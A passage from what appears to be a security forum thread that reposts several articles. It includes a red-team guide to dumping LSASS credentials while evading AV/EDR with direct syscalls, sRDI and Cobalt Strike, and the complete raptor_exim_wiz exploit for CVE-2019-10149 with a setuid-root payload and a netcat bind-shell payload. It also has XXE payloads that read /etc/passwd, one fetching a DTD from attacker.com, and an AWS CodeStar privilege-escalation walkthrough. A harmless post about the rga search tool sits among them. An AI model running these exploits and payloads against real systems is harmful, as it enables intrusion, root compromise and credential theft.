MSRC asked for clarification 28 May 2019 MSRC confirmed fix was applied 06 June 2019 Fix was confirmed 14 June 2019 Disclosure 18 June 2019 Posted by Parsia Jun 18, 2019Tags: rce Thick Client Proxying - Part 9 - The Windows DNS Cache Sursa: https://parsiya.net/blog/2019-06-18-chaining-three-bugs-to-get-rce-in-microsoft-attacksurfaceanalyzer/
  8. Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR Cornelis de Plaa | June 19, 2019 In this blog post we will explore the use of direct system calls, restore hooked API calls and ultimately combine this with a shellcode injection technique called sRDI. We will combine these techniques in proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike, while not touching disk and evading AV/EDR monitored user-mode API calls. As companies grow in their cybersecurity maturity level, attackers also evolve in their attacking capabilities. As a red team we try to offer the best value to our customers, so we also need to adapt to more advanced tactics and techniques attackers are using to bypass modern defenses and detection mechanisms. Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. So time for us to sharpen our offensive tool development skills. Source code of the PoC can be found here: https://github.com/outflanknl/Dumpert What are direct system calls? In order to understand what system calls really are, we first have to dig a little bit into Operating System architecture, specifically Windows. If you are old (not like me… ) and have a MS-DOS background, you probably remember that a simple application crash could result in a complete system crash. This was due to the fact that the operating system was running in real mode, which means that the processor is running in a mode in which no memory isolation and protection is applied. A bad program or bug could result in a complete crash of the Operating System due to critical system memory corruption, as there was no restriction in what memory regions could be accessed or not. This all changed with newer processors and Operating Systems supporting the so-called protected mode. This mode introduced many safeguards and could protect the system from crashes by isolating running programs from each other using virtual memory and privilege levels or rings. On a Windows system two of these rings are actually used. Application are running in user-mode, which is the equivalent of ring 3 and critical system components like the kernel and device drivers are running in kernel-mode which corresponds to ring 0. Using these protection rings makes sure that applications are isolated and cannot directly access critical memory sections and system resources running in kernel-mode. When an application needs to execute a privileged system operation, the processor first needs to switch into ring 0 to handover the execution flow into kernel-mode. This is where system calls come into place. Let’s demonstrate this privilege mode switching while monitoring a notepad.exe process and saving a simple text file: WriteFile call stack in Process Monitor . The screenshot shows the program flow (call stack) from the notepad.exe process when we save a file. We can see the Win32 API WriteFile call following the Native API NtWriteFile call (more on APIs later). For a program to save a file on disk, the Operating System needs access to the filesystem and device drivers. These are privileged operations and not something the application itself should be allowed to do. Accessing device drivers directly from an application could result in very bad things. So, the last API call before entering kernel-mode is responsible for pulling the dip switch into kernel land. The CPU instruction for entering kernel-mode is the syscall instruction (at least on x64 architecture, which we will discuss in this blog only). We can see this in the following WinDBG screenshot, which shows the unassembled NtWriteFile instruction: Disassembled NtWriteFile API call in WinDBG. The NtWriteFile API from ntdll.dll is responsible for setting up the relevant function call arguments on the stack, then moving the system call number from the NtWriteFile call in the EAX register and executing the syscall instruction. After that, the CPU will jump into kernel-mode (ring 0). The kernel uses the dispatch table (SSDT) to find the right API call belonging to the system call number, copies the arguments from the user-mode stack into the kernel-mode stack and executes the kernel version of the API call (in this case ZwWriteFile). When the kernel routines are finished, the program flow will return back into user-mode almost the same way, but will return the return values from the kernel API calls (for example a pointer to received data, or a handle to a file). This (user-mode) is also the place where many security products like AV, EDR and sandbox software put their hooks, so they can detour the execution flow into their engines to monitor and intercept API calls and block anything suspicious. As you have seen in the disassembled view of the NtWriteFile instruction you may have noticed that it only uses a few assembly instructions, from which the syscall number and the syscall instruction itself are the most important. The only important thing before executing a direct system call is that the stack is setup correctly with the expected arguments and using the right calling convention. So, having this knowledge… why not execute the system calls directly and bypass the Windows and Native API, so that we also bypass any user-mode hooks that might be in place? Well this is exactly what we are going to do, but first a little bit more about the Windows programming interfaces. The Windows programming interfaces In the following screenshot we see a high-level overview of the Windows OS Architecture: For a user-mode application to interface with the underlying operating system, it uses an application programming interface (API). If you are a Windows developer writing C/C++ application, you would normally use the Win32 API. This is Microsoft’s documented programming interfaces which consists of several DLLs (so called Win32 subsystem DLLs). Underneath the Win32 API sits the Native API (ntdll.dll), which is actually the real interface between the user-mode applications and the underlying operating system. This is the most important programming interface but “not officially” documented and should be avoided by programmers in most circumstances. The reason why Microsoft has put another layer on top of the Native API is that the real magic occurs within this Native API layer as it is the lowest layer between user-mode and the kernel. Microsoft probably decided to shield off the documented APIs using an extra layer, so they could make architectural OS changes without affecting the Win32 programming interface. So now we know a bit more about system calls and the Windows programming APIs, let’s see how we can actually skip the programming APIs and invoke the APIs directly using their system call number or restore potentially hooked API calls. Using system calls directly We already showed how to disassemble native API calls to identify the corresponding system call numbers. Using a debugger this could take a lot of time. So, the same can be done using IDA (or Ghidra) by opening a copy of ntdll.dll and lookup the needed function: Disassembled NtWriteFile API call in IDA. One slight problem… system call numbers change between OS versions and sometimes even between service pack/built numbers. Fortunately @j00ru from Google project Zero comes to the rescue with his online system call tables. j00ru did an amazing job keeping up with all system call numbers in use by different Windows versions and between builds. So now we have a great resource to look up all the system calls we want to use. In our code, we want to invoke the system calls directly using assembly. Within Visual Studio we can enable assembly code support using the masm build dependency, which allows us to add .asm files and code within our project. Assembly system call functions in .asm file. All we need to do is gather OS version information from the system we are using and create references between the native API function definitions and OS version specific system call functions in assembly language. For this we can use the Native API RtlGetVersion routine and save this information into a version info structure. Reference function pointers based on OS info. Exported OS specific assembly functions + native API function definitions. Now we can use the system call functions in our code as if they are normal native API functions: Using ZwOpenProcess systemcall function as a Native API call. Restoring hooked API calls with direct system calls Writing advanced malware that only uses direct system calls and completely evades user-mode API calls is practically impossible or at least extremely cumbersome. Sometimes you just want to use an API call in your malicious code. But what if somewhere in the call stack there is a user-mode hook by AV/EDR? Let’s have a look how we can remove the hook using direct system calls. Basic user-mode API hooks by AV/EDR are often created by modifying the first 5 bytes of the API call with a jump (JMP) instruction to another memory address pointing to the security software. The technique of unhooking this method has already been documented within two great blog posts by @SpecialHoang, and by MDsec’s Adam Chester and Dominic Chell. If you study these methods carefully, you will notice the use of API calls such as VirtualProtectEx and WriteProcessMemory to unhook Native API functions. But what if the first API calls are hooked and monitored already somewhere in the call stack? Inception, get it? Direct system calls to the rescue! In the PoC code we created we basically use the same unhooking technique by restoring the first 5 bytes with the original assembly instructions, including the system call number. The only difference is that the API calls we use to unhook the APIs are direct systems call functions (ZwProtectVirtualMemory and ZwWriteVirtualMemory). Using direct system call function to unhook APIs. Proof of concept In our operations we sometimes need Mimikatz to get access to credentials, hashes and Kerberos tickets on a target system. Endpoint detection software and threat hunting instrumentation are pretty good in detection and prevention of Mimikatz nowadays. So, if you are in an assessment and your scenario requires to stay under the radar as much as possible, using Mimikatz on an endpoint is not best practice (even in-memory). Also, dumping LSASS memory with tools such as procdump is often caught by modern AV/EDR using API hooks. So, we need an alternative to get access to LSASS memory and one option is to create a memory dump of the LSASS process after unhooking relevant API functions. This technique was also documented in @SpecialHoang blog. As a proof of concept, we created a LSASS memory dump tool called “Dumpert”. This tool combines direct system calls and API unhooking and allows you to create a LSASS minidump. This might help bypassing defenses of modern AV and EDR products. The minidump file can be used in Mimikatz to extract credential information without running Mimikatz on the target system. Mimikatz minidump import. Of course, dropping executable files on a target is probably something you want to avoid during an engagement, so let’s take this a step further… sRDI – Shellcode Reflective DLL Injection If we do not want to touch disk, we need some sort of injection technique. We can create a reflective loadable DLL from our code, but reflective DLL injection leaves memory artefacts behind that can be detected. My colleague @StanHacked recently pointed me to an interesting DLL injection technique called shellcode Reflective DLL Injection. sRDI allows for the conversion of DLL files to position independent shellcode. This technique is developed by Nick Landers (@monoxgas) from Silent Break Security and is basically a new version of RDI. Some advantages of using sRDI instead of standard RDI: You can convert any DLL to position independent shellcode and use standard shellcode injection techniques. Your DLL does not need to be reflection-aware as the reflective loader is implemented in shellcode outside of your DLL. Uses proper Permissions, no massive RWX blob. Optional PE Header Cleaning. More detailed information about sRDI can be found in this blog. Let our powers combine! Okay with all the elements in place, let’s see if we can combine these elements and techniques and create something more powerful that could be useful during Red Team operations: We created a DLL version of the “dumpert” tool using the same direct system calls and unhooking techniques. This DLL can be run standalone using the following command line: “rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump”, but in this case we are going to convert it to a sRDI shellcode. Compile the DLL version using Visual Studio and turn it into a position independent shellcode. This can be done using the ConvertToShellcode.py script from the sRDI project: “python3 ConvertToShellcode.py Outflank-Dumpert.dll” To inject the shellcode into a remote target, we can use Cobalt Strike’s shinject command. Cobalt Strike has a powerful scripting language called aggressor script which allows you to automate this step. To make this easier we provided an aggressor script which enables a “dumpert” command in the beacon menu to do the dirty job. The dumpert script uses shinject to inject the sRDI shellcode version of the dumpert DLL into the current process (to avoid CreateRemoteThread API). Then it waits a few seconds for the lsass minidump to finish and finally download the minidump file from the victim host. Now you can use Mimikatz on another host to get access to the lsass memory dump including credentials, hashes e.g. from our target host. For this you can use the following command: “sekurlsa::minidump C:\Dumpert\dumpert.dmp” Conclusion Malware that evades security product hooks is increasing and we need to be able to embed such techniques in our projects. In this blog we used references between the native API function definitions and OS version specific system call functions in assembly. This allows us to use direct system calls function as if they were normal Native API functions. We combined this technique together with an API unhooking technique to create a minidump from the LSASS process and used sRDI in combination with Cobalt Strike to inject the dumpert shellcode into memory of a target system. Detecting malicious use of system calls is difficult. Because user-mode programming interfaces are bypassed, the only place to look for malicious activity is the kernel itself. But with kernel PatchGuard protection it is infeasible for security products to create hooks or modification in the running kernel. I hope this blogpost is useful in understanding the advanced techniques attackers are using nowadays and provides a useful demonstration on how to emulate these techniques during Red Team operations. Any feedback or additional ideas, let me know. Sursa: https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
  9. rga: ripgrep, but also search in PDFs, E-Books, Office documents, zip, tar.gz, etc. Jun 16, 2019 • Last Update Jun 19, 2019 rga is a line-oriented search tool that allows you to look for a regex in a multitude of file types. rga wraps the awesome ripgrep and enables it to search in pdf, docx, sqlite, jpg, zip, tar.*, movie subtitles (mkv, mp4), etc. Examples PDFs Say you have a large folder of papers or lecture slides, and you can't remember which one of them mentioned GRUs. With rga, you can just run this: ~$ rga "GRU" slides/ slides/2016/winter1516_lecture14.pdf Page 34: GRU LSTM Page 35: GRU CONV Page 38: - Try out GRU-RCN! (imo best model) slides/2018/cs231n_2018_ds08.pdf Page 3: ● CNNs, GANs, RNNs, LSTMs, GRU Page 35: ● 1) temporal pooling 2) RNN (e.g. LSTM, GRU) slides/2019/cs231n_2019_lecture10.pdf Page 103: GRU [Learning phrase representations using rnn Page 105: - Common to use LSTM or GRU and it will recursively find a string in pdfs, including if some of them are zipped up. You can do mostly the same thing with pdfgrep -r, but you will miss content in other file types and it will be much slower: Searching in 65 pdfs with 93 slides each 0 5 10 15 20 pdfgrep rga (first run) rga (subsequent runs) run time (seconds, lower is better) On the first run rga is mostly faster because of multithreading, but on subsequent runs (with the same files but any regex query) rga will cache the text extraction, so it becomes almost as fast as searching in plain text files. All runs were done with a warm FS cache. Other files rga will recursively descend into archives and match text in every file type it knows. Here is an example directory with different file types: demo ├── greeting.mkv ├── hello.odt ├── hello.sqlite3 └── somearchive.zip ├── dir │ ├── greeting.docx │ └── inner.tar.gz │ └── greeting.pdf └── greeting.epub (see the actual directory here) ~$ rga "hello" demo/ demo/greeting.mkv metadata: chapters.chapter.0.tags.title="Chapter 1: Hello" 00:08.398 --> 00:11.758: Hello from a movie! demo/hello.odt Hello from an OpenDocument file! demo/hello.sqlite3 tbl: greeting='hello', from='sqlite database!' demo/somearchive.zip dir/greeting.docx: Hello from a MS Office document! dir/inner.tar.gz: greeting.pdf: Page 1: Hello from a PDF! greeting.epub: Hello from an E-Book! It can even search jpg / png images and scanned pdfs using OCR, though this is disabled by default since it is not useful that often and pretty slow. ~$ # find screenshot of crates.io ~$ rga crates ~/screenshots --rga-adapters=+pdfpages,tesseract screenshots/2019-06-14-19-01-10.png crates.io I Browse All Crates Docs v Documentation Repository Dependent crates ~$ # there it is! Setup Linux, Windows and OSX binaries are available in GitHub releases. See the readme for more information. For Arch Linux, I have packaged rga in the AUR: yay -S ripgrep-all Technical details The code and a few more details are here: https://github.com/phiresky/ripgrep-all rga simply runs ripgrep (rg) with some options set, especially --pre=rga-preproc and --pre-glob. rga-preproc [fname] will match an "adapter" to the given file based on either it's filename or it's mime type (if --rga-accurate is given). You can see all adapters currently included in src/adapters. Some rga adapters run external binaries to do the actual work (such as pandoc or ffmpeg), usually by writing to stdin and reading from stdout. Others use a Rust library or bindings to achieve the same effect (like sqlite or zip). To read archives, the zip and tar libraries are used, which work fully in a streaming fashion - this means that the RAM usage is low and no data is ever actually extracted to disk! Most adapters read the files from a Read, so they work completely on streamed data (that can come from anywhere including within nested archives). During the extraction, rga-preproc will compress the data with ZSTD to a memory cache while simultaneously writing it uncompressed to stdout. After completion, if the memory cache is smaller than 2MByte, it is written to a rkv cache. The cache is keyed by (adapter, filename, mtime), so if a file changes it's content is extracted again. Future Work I wanted to add a photograph adapter (based on object classification / detection) for fun, so you can grep for "mountain" and it will show pictures of mountains, like in Google Photos. It worked with YOLO, but something more useful and state-of-the art like this proved very hard to integrate. 7z adapter (couldn't find a nice to use Rust library with streaming) Allow per-adapter configuration options (probably via env (RGA_ADAPTERXYZ_CONF=json)) Maybe use a different disk kv-store as a cache instead of rkv, because I had some weird problems with that. SQLite is great. All other Rust alternatives I could find don't allow writing from multiple processes. Tests! There's some more (mostly technical) todos in the code I don't know how to fix. Help wanted. Similar tools pdfgrep this gist has my proof of concept version of a caching extractor to use ripgrep as a replacement for pdfgrep. this gist is a more extensive preprocessing script by @ColonolBuendia Sursa: https://phiresky.github.io/blog/2019/rga--ripgrep-for-zip-targz-docx-odt-epub-jpg/
  10. #!/bin/bash # # raptor_exim_wiz - "The Return of the WIZard" LPE exploit # Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info> # # A flaw was found in Exim versions 4.87 to 4.91 (inclusive). # Improper validation of recipient address in deliver_message() # function in /src/deliver.c may lead to remote command execution. # (CVE-2019-10149) # # This is a local privilege escalation exploit for "The Return # of the WIZard" vulnerability reported by the Qualys Security # Advisory team. # # Credits: # Qualys Security Advisory team (kudos for your amazing research!) # Dennis 'dhn' Herrmann (/dev/tcp technique) # # Usage (setuid method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m setuid # Preparing setuid shell helper... # Delivering setuid payload... # [...] # Waiting 5 seconds... # -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned # # id # uid=0(root) gid=0(root) groups=0(root) # # Usage (netcat method): # $ id # uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...] # $ ./raptor_exim_wiz -m netcat # Delivering netcat payload... # Waiting 5 seconds... # localhost [127.0.0.1] 31337 (?) open # id # uid=0(root) gid=0(root) groups=0(root) # # Vulnerable platforms: # Exim 4.87 - 4.91 # # Tested against: # Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz] # METHOD="setuid" # default method PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost' PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost' # usage instructions function usage() { echo "$0 [-m METHOD]" echo echo "-m setuid : use the setuid payload (default)" echo "-m netcat : use the netcat payload" echo exit 1 } # payload delivery function exploit() { # connect to localhost:25 exec 3<>/dev/tcp/localhost/25 # deliver the payload read -u 3 && echo $REPLY echo "helo localhost" >&3 read -u 3 && echo $REPLY echo "mail from:<>" >&3 read -u 3 && echo $REPLY echo "rcpt to:<$PAYLOAD>" >&3 read -u 3 && echo $REPLY echo "data" >&3 read -u 3 && echo $REPLY for i in {1..31} do echo "Received: $i" >&3 done echo "." >&3 read -u 3 && echo $REPLY echo "quit" >&3 read -u 3 && echo $REPLY } # print banner echo echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit' echo 'Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>' echo # parse command line while [ ! -z "$1" ]; do case $1 in -m) shift; METHOD="$1"; shift;; * ) usage ;; esac done if [ -z $METHOD ]; then usage fi # setuid method if [ $METHOD = "setuid" ]; then # prepare a setuid shell helper to circumvent bash checks echo "Preparing setuid shell helper..." echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null if [ $? -ne 0 ]; then echo "Problems compiling setuid shell helper, check your gcc." echo "Falling back to the /bin/sh method." cp /bin/sh /tmp/pwned fi echo # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_SETUID exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 ls -l /tmp/pwned /tmp/pwned # netcat method elif [ $METHOD = "netcat" ]; then # select and deliver the payload echo "Delivering $METHOD payload..." PAYLOAD=$PAYLOAD_NETCAT exploit echo # wait for the magic to happen and spawn our shell echo "Waiting 5 seconds..." sleep 5 nc -v 127.0.0.1 31337 # print help else usage fi Sursa: https://www.exploit-db.com/exploits/46996
  11. Arseniy Sharoglazov Exploiting XXE with local DTD files This little technique can force your blind XXE to output anything you want! Why do we have trouble exploiting XXE in 2k18? Imagine you have an XXE. External entities are supported, but the server’s response is always empty. In this case you have two options: error-based and out-of-band exploitation. Consider this error-based example: Request Response <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd"> %ext; ]> <message></message> java.io.FileNotFoundException: /nonexistent/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/usr/bin/nologin daemon:x:2:2:daemon:/:/usr/bin/nologin (No such file or directory) Contents of ext.dtd <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; See? You are using an external server for payload delivery. What can you do if there is a firewall between you and the target server? Nothing! What if we just put external DTD content directly in the DOCTYPE? Some errors will always appear: Request Response <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ]> <message></message> Internal Error: SAX Parser Error. Detail: The parameter entity reference “%file;” cannot occur within markup in the internal subset of the DTD. External DTD allows us to include one entity inside the second, but it is prohibited in the internal DTD. What can we do with internal DTD? To use external DTD syntax in the internal DTD subset, you can bruteforce a local dtd file on the target host and redefine some parameter-entity references inside it: Request Response <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; &#x25;error; <!ELEMENT aa (bb'> %local_dtd; ]> <message>any text</message> java.io.FileNotFoundException: /nonexistent/ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/usr/bin/nologin daemon:x:2:2:daemon:/:/usr/bin/nologin (No such file or directory) Contents of sip-app_1_0.dtd … <!ENTITY % condition "and | or | not | equal | contains | exists | subdomain-of"> <!ELEMENT pattern (%condition;)> … It works because all XML entities are constant. If you define two entities with the same name, only the first one will be used. How can we find a local dtd file? Nothing is easier than enumerating files and directories. Below are a few more examples of successful applications of this trick: Custom Linux System <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamsa 'Your DTD code'> %local_dtd; Custom Windows System <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % SuperClass '>Your DTD code<!ENTITY test "test"'> %local_dtd; Thanks to @Mike_n1 from Positive Technologies for sharing this path of always-existing Windows DTD file. Cisco WebEx <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '>Your DTD code<!ENTITY test "test"'> %local_dtd; Citrix XenMobile Server <!ENTITY % local_dtd SYSTEM "jar:file:///opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"> <!ENTITY % Body '>Your DTD code<!ENTITY test "test"'> %local_dtd; Custom Multi-Platform IBM WebSphere Application <!ENTITY % local_dtd SYSTEM "./../../properties/schemas/j2ee/XMLSchema.dtd"> <!ENTITY % xs-datatypes 'Your DTD code'> <!ENTITY % simpleType "a"> <!ENTITY % restriction "b"> <!ENTITY % boolean "(c)"> <!ENTITY % URIref "CDATA"> <!ENTITY % XPathExpr "CDATA"> <!ENTITY % QName "NMTOKEN"> <!ENTITY % NCName "NMTOKEN"> <!ENTITY % nonNegativeInteger "NMTOKEN"> %local_dtd; Timeline 01/01/2016 — Discovering the technique 12/12/2018 — Writing the article :D 13/12/2018 — Full disclosure 2018 DTD OOB WAF XML XXE Sursa: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/
  12. Escalating AWS IAM Privileges with an Undocumented CodeStar API June 18, 2019 Spencer Gietzen Introduction to AWS IAM Privilege Escalation There are an extensive amount of individual APIs available on AWS, which also means there are many ways to misconfigure permissions to those APIs. These misconfigurations can give attackers the ability to abuse APIs to gain more privileges than what was originally intended by your AWS administrator. We at Rhino Security Labs have demonstrated this in the past with our blog post on 17 different privilege escalation methods in AWS. Most of these privilege escalation methods rely on the IAM service for abuse. An example of this is the “iam:PutUserPolicy” permission that allows a user to create an administrator-level inline policy on themselves, making themselves an administrator. This blog will outline a new method of abuse for privilege escalation within AWS through CodeStar, an undocumented AWS API, as well as two new privilege escalation checks and auto-exploits added to Pacu’s “iam__privesc_scan” module. AWS CodeStar AWS CodeStar is a service that allows you to “quickly develop, build, and deploy applications on AWS”. It integrates a variety of other different AWS services and 3rd party applications (such as Atlassian Jira) to “track progress across your entire software development process”. It is essentially a quick, easy way to get your projects up and running with your team in AWS. CodeStar Undocumented APIs Like many AWS services, CodeStar has some public-facing APIs that are not publicly documented. In most cases, these exist for convenience when browsing AWS through the web console. For example, CodeStar supports the following APIs, but they are not documented in the official AWS documentation: codestar:GetTileData codestar:PutTileData codestar:VerifyServiceRole There are more undocumented APIs than on this list–the other non-listed APIs are typically used by your web browser to display and verify information in the AWS web console. I discovered these undocumented APIs by simply setting up Burp Suite to intercept my HTTP traffic while browsing the AWS web console and seeing what showed up. Here is an example of some requests Burp Suite picked up while browsing CodeStar in the AWS web console: codestar:CreateProjectFromTemplate One of the undocumented APIs that we discovered was the codestar:CreateProjectFromTemplate API. This API was created for the web console to allow you to create sample (templated) projects to try out CodeStar. If you look at the documented APIs for CodeStar, you’ll only see codestar:CreateProject, but this page references project templates as well. As long as the CodeStar service role exists in the target account, this single undocumented API allows us to escalate our privileges in AWS. Because this is an undocumented API and people typically don’t know it exists, it’s likely not granted to any users in AWS directly. This means that although you only need this single permission to escalate privileges, it will likely be granted with a broader set of permissions, such as “codestar:Create*” or “codestar:*” in your IAM permissions. Because those are using the wildcard character “*”, it expands out and includes codestar:CreateProjectFromTemplate. If you needed another reason to stop using wildcards in your IAM policies, this is it. The following AWS-managed IAM policies grant access to codestar:CreateProjectFromTemplate, but there are likely many more customer-managed IAM policies out there that grant it as well. arn:aws:iam::aws:policy/AdministratorAccess (obviously) arn:aws:iam::aws:policy/PowerUserAccess arn:aws:iam::aws:policy/AWSCodeStarFullAccess arn:aws:iam::aws:policy/service-role/AWSCodeStarServiceRole Undocumented CodeStar API to Privilege Escalation The codestar:CreateProjectFromTemplate permission was the only permission needed to create a project from the variety of templates offered in the AWS web console. The trick here is that these templates are “managed” by AWS, so when you choose one to launch, it will use the CodeStar service role to launch the project and not your own permissions. That means that you are essentially instructing the CodeStar service role to act on your behalf, and because that service role likely has more permissions than you do, you can utilize them for malicious activity. As part of these templates, an IAM policy is created in your account named “CodeStarWorker-<project name>-Owner”, where <project name> is the name you give the CodeStar project. The CodeStar service role then attaches that policy to your user because you are the owner of that project. Just by doing that, we have already escalated our permissions, because the “CodeStarWorker-<project name>-Owner” policy grants a lot of access. Most permissions are restricted to the resources that the project created, but some are more general (like a few IAM permissions on your own user). There are also other policies and roles that get created as part of this process–some important and some not–so we’ll touch on those as we go. The above screenshot shows some of the available templates when creating a CodeStar project through the web console. Prior to AWS’s Fix When this vulnerability was originally discovered, the permissions that the “CodeStarWorker-<project name>-Owner” policy granted were slightly different than they are now. Originally, as long as the CodeStar service role existed in the account, an IAM user with only the codestar:CreateProjectFromTemplate permission could escalate their permissions to a full administrator of the AWS account. This was because one of the resources that was created was an IAM role named “CodeStarWorker-<project name>-CloudFormation” and it was used to create a CloudFormation stack to build the project that you chose. It was originally granted full access to 50+ AWS services, including a variety of IAM permissions. A few of the important IAM permissions included: iam:AttachRolePolicy iam:AttachUserPolicy iam:PutRolePolicy If you have read our blog on AWS privilege escalation, then you already know these permissions can be used to quickly escalate a user or role to a full administrator. For a copy of the old policy that was attached to the “CodeStarWorker-<project name>-CloudFormation” IAM role, visit this link. With that unrestricted access to so many services, you could almost certainly compromise most of your target’s resources in AWS, spin up cryptominers, or just delete everything. To use these permissions, we needed to gain access to the “CodeStarWorker-<project name>-CloudFormation” IAM role. This wasn’t difficult because it was already passed to a CloudFormation stack that the “CodeStarWorker-<project name>-Owner” IAM policy granted us access to. This meant we just needed to update the CloudFormation stack and pass in a template that would use the role’s permissions to do something on our behalf. Due to CloudFormation’s limitations, this “something” needed to be an inline policy to make that same CloudFormation role an administrator, then a second UpdateStack call would need to be made to also make your original user an administrator. There were many reasons for this, but essentially it was because you couldn’t instruct CloudFormation to attach an existing managed IAM policy to an existing user. Disclosure and How AWS Fixed the Privilege Escalation We disclosed this vulnerability to AWS Security on March 19th, 2019, and worked with them to resolve the risk of this attack. Over the next few months, multiple fixes were implemented because a few bypasses were discovered the first few times. Those bypasses still allowed for full administrator privilege escalation, even after their initial fixes, but by working with them, we were able to get that resolved. By mid-May 2019, we had the go-ahead that the vulnerability had been remediated. Overall, this vulnerability was fixed by limiting the permissions granted to the “CodeStarWorker-<project name>-Owner” IAM policy and the “CodeStartWorker-<project name>-CloudFormation” IAM role. The role was restricted by requiring the use of an IAM permissions boundary in its IAM permissions, which is effective in preventing privilege escalation to a full administrator. Depending on what other resources/misconfigurations exist in the environment, it might still be possible to escalate to full admin access (through a service such as Lambda or EC2) after exploiting this method. They also introduced another fix, where the AWS web console now uses “codestar:CreateProject” and “iam:PassRole” to create projects from templates, but the “codestar:CreateProjectFromTemplate” API is still publicly accessible and enabled, so it can still be abused for privilege escalation (just to a lesser extent than before). The Attack Vector After the Fix While the AWS CodeStar team was responsive & implemented several fixes, we were still able to identify a way to use the undocumented API for privilege escalation. This wasn’t as severe as before AWS implemented their fixes, but still noteworthy. The new attack path looks like this: Use codestar:CreateProjectFromTemplate to create a new project. You will be granted access to “cloudformation:UpdateStack” on a stack that has the “CodeStarWorker-<project name>-CloudFormation” IAM role passed to it. Use the CloudFormation permissions to update the target stack with a CloudFormation template of your choice. The name of the stack that needs to be updated will be “awscodestar-<project name>-infrastructure” or “awscodestar-<project name>-lambda”, depending on what template is used (in the example exploit script, at least). At this point, you would now have full access to the permissions granted to the CloudFormation IAM role. You won’t be able to get full administrator with this alone; you’ll need other misconfigured resources in the environment to help you do that. Automation and Exploitation with Pacu This privilege escalation method has been integrated into Pacu’s “iam__privesc_scan”, so you can check what users/roles are vulnerable within your account. To check your account for privilege escalation (all 17+ methods we have blogged about, including this one) from a fresh Pacu session, you can run the following commands from the Pacu CLI: 1. import_keys default: Import the “default” profile from the AWS credentials file (~/.aws/credentials) 2. run iam__enum_users_roles_policies_groups --users: Enumerate IAM users 3. run iam__enum_permissions --all-users: Enumerate their permissions 4. run iam__privesc_scan --offline: Check for privilege escalation methods As you can see, two IAM users were found and had their permissions enumerated. One of them was already an administrator, and the other user, “VulnerableUser”, is vulnerable to the “CodeStarCreateProjectFromTemplate” privilege escalation method. Two Bonus Privilege Escalations Added to Pacu With this blog release and Pacu update, we also added two more checks to the “iam__privesc_scan” module, both with auto-exploitation available. The first method is “PassExistingRoleToNewCodeStarProject” which uses “codestar:CreateProject” and “iam:PassRole” to escalate an IAM user or role to a full administrator. The second method is “CodeStarCreateProjectThenAssociateTeamMember” which uses “codestar:CreateProject” and “codestar:AssociateTeamMember” to make an IAM user the owner of a new CodeStar project, which will grant them a new policy with a few extra permissions. Pacu can be found on our GitHub with the latest updates pushed, so we suggest using it to check your own environment for any of these new privilege escalations. CreateProjectFromTemplate Exploit Script This privilege escalation method did not have auto-exploitation integrated into Pacu because it is an undocumented API, and thus unsupported in the “boto3” Python library. Instead, an exploit script was derived from AWS’s guide on manually signing API requests in Python. The standalone exploitation script can be found here. The script has the option of using two different templates, one of which grants more access than the other, but it requires that you know the ID of a VPC, the ID of a subnet in that VPC, and the name of an SSH key pair in the target region. It’s possible to collect some of that information by running the exploit script without that knowledge, then using the escalated permissions to enumerate that information, then re-running the exploit script again with the data you discovered. Using the Script The only permission required to run the script is “codestar:CreateProjectFromTemplate”, but you must be a user (not a role) because of how CodeStar works. Without prior information: you can run the script like this, which will use the default AWS profile: python3 CodeStarPrivEsc.py --profile default With the EC2/VPC information: you can run the script like this: python3 CodeStarPrivEsc.py --profile default --vpc-id vpc-4f1d6h18 --subnet-id subnet-2517b823 --key-pair-name MySSHKey There should be quite a bit of output, but at this point, you will just be waiting for the CloudFormation stacks to spin up in the environment and create all the necessary resources. Right away, you’ll gain some additional privileges through the “CodeStar_<project name>_Owner” IAM policy, but if you 